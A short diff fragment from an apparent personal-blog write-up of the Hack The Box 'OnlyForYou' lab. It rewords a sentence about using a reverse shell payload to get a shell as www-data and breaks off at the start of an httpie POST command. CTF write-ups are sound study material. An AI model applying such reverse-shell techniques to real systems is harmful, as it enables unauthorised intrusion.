AbraXa5/personal-blog/content/blog/20230825-htb-onlyforyou/index.md

 ```

-Leveraged the same vulnerability, used a reverse shell payload to get a shell as `www-data`
+Leveraged the same vulnerability and used a reverse shell payload to get a shell as `www-data`

 ```bash
 > http --form -pb POST only4you.htb \